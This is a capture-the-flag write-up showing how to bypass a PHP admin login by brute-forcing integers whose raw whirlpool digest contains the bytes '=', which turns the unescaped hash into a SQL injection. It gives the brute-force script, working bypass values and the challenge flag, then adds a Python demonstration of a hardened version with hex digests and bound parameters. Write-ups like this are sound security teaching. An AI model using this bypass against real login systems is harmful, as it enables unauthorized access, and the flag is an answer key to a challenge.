We were given the source code of this challenge. To get the flag we have to log in as 'admin'. Below is the PHP code:

```php
$flag = "/flag.txt";
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");
$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps);
$ps = hash("whirlpool",$ps, true);
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'");
$row = mysql_fetch_assoc($result);
if (isset($row['user_id'])) {
    if ($row['user_id'] == "admin") {
        echo "hello, admin<br />";
        die(file_get_contents($flag));
    } else {
        die("hello, ".$row['user_id']);
    }
} else {
    msg("login failed..");
}
```

The issue with the code is that hash() is called with $raw_output set to true, so it returns raw binary data. The escaping was applied before hashing, so any quote byte in the digest lands in the query unescaped, leading to SQL injection.
```
string hash ( string $algo , string $data [, bool $raw_output = false ] )
```

raw_output: When set to TRUE, outputs raw binary data. FALSE outputs lowercase hexits.

To bypass the login, we need to find a value that, when hashed with whirlpool, gives a digest containing the byte sequence '='. The condition then becomes user_ps='<bytes>'='<bytes>', which MySQL evaluates left to right as (user_ps='<bytes>')='<bytes>'; the resulting 0 is compared with a string that MySQL casts to a number (normally 0), so the condition holds for every row regardless of the real password.
```php
<?php
// Search integers whose raw whirlpool digest contains the byte sequence '='
for ($i = 0; $i < 10000000; $i++)
    if (strpos(hash("whirlpool", $i, true), "'='") !== false)
        echo $i."\n";
?>
```
```
[ctf@renorobert CodeGate]# php brute.php
364383
527980
629987
708365
991410
1311789
1608604
1974557
^C
```

Logging in with any of the above values as the password results in login bypass. The flag for the challenge is DAER0NG_DAER0NG_APPLE_TR33
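To show why raw_output=true breaks the quoting, and what the fix looks like, here is an added Python example; it is not the challenge's code. It uses sha256 in place of whirlpool (Python's hashlib does not guarantee whirlpool, and the mechanism is the same for any raw digest), a constructed fake digest, and an assumed users table, escape() stand-in and function names.

```python
import hashlib
import sqlite3

# Constructed stand-in for a raw 64-byte digest: a real digest is pseudo-random
# bytes, and some inputs yield the sequence '=' just as brute.php found.
FAKE_RAW_DIGEST = b"\x8f\x13'='\x00\xa7" + b"\x42" * 57

def escape(s: str) -> str:
    """Minimal stand-in for mysql_real_escape_string (backslashes and quotes)."""
    return s.replace("\\", "\\\\").replace("'", "\\'")

def raw_digest(i: int, algo: str = "sha256") -> bytes:
    """hash($algo, $i, true) equivalent: raw bytes, quotes and all."""
    return hashlib.new(algo, str(i).encode()).digest()

def vulnerable_query(user_id: str, digest: bytes) -> str:
    """Mirrors the challenge: escaping ran before hashing, so the raw digest
    is interpolated into the SQL string untouched."""
    ps = digest.decode("latin-1")  # one character per byte, quotes included
    return f"select * from users where user_id='{escape(user_id)}' and user_ps='{ps}'"

def quotes_balanced(sql: str) -> bool:
    """True only if the query has just the four quotes the template put there."""
    return sql.count("'") == 4

def find_input_with_bytes(needle: bytes, algo: str = "sha256", limit: int = 5_000_000):
    """brute.php generalised: first integer whose raw digest contains needle, else None."""
    for i in range(limit):
        if needle in raw_digest(i, algo):
            return i
    return None

def demo_db() -> sqlite3.Connection:
    """In-memory users table storing hex digests (what hash(..., false) returns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users(user_id text, user_ps text)")
    conn.execute("insert into users values(?, ?)", ("admin", FAKE_RAW_DIGEST.hex()))
    return conn

def safe_lookup(conn: sqlite3.Connection, user_id: str, digest: bytes):
    """Hardened form: hex encoding (no quote bytes possible) plus bound parameters."""
    row = conn.execute("select user_id from users where user_id=? and user_ps=?",
                       (user_id, digest.hex())).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    print("vulnerable query intact:", quotes_balanced(vulnerable_query("admin", FAKE_RAW_DIGEST)))
    print("admin via safe lookup:", safe_lookup(demo_db(), "admin", FAKE_RAW_DIGEST))
    print("first int whose raw sha256 contains '=':", find_input_with_bytes(b"'='"))
```

The last line of the demo may take a few seconds, since a 3-byte sequence appears in a 32-byte digest only about once per half a million inputs.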